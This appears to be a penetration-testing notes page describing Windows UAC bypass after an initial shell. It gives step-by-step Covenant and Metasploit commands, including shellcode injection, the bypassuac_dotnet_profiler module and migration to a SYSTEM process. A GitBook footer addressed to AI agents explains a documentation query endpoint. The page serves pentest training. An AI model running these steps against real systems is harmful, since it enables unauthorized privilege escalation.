> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/uacbypass.md). # UAC Bypass * We assume that we already have a shell on the target ## With Covenant * Get the helper.ps1 script with Powershell Import * Copy an encoded launcher from the Launchers session of Covenant * Type this command and append it with your launcher and close the quote `PowerShell helper -custom "cmd.exe /c "` * You will get a shell as the same user but your shell will be in an administrative user context * If you type `ps` you should be able to see also admin process * To have an admin shell we can download a grunt as a shellcode * To do so, We go to grunt we select shellcode we click on generate and we download the bin * Then back on the shell, we Type `inject` in the most recent shell and select the binary then use a process number with admin privileges click on execute * We should have a shell as system ## With Metasploit * Interact with the current session using `session -i id-of-session` * type `run post/multi/recon/local_exploit_suggester` * We should see in the list this if the target is vulnerable ``` [+] 192.168.3.4 - exploit/windows/local/always_install_elevated: The target is vulnerable. [+] 192.168.3.4 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. ``` * Ctrl Z the session * `use exploit/windows/local/bypassuac_dotnet_profiler` * set the session to the id of the one we have on the target * and then exploit -j * We should have a new session * We are not admin yet but we have and administrative user context * List processes using `ps` and find one with admin rights remember the process id * type `migrat process-id` * if you type `getuid` you should have authority system ## Resources * To understand more about Fodhelper {% embed url="" %} Bypassing Defender The Easy Way – FodHelper by Joe Helle {% endembed %} {% embed url="" %} TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/uacbypass.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.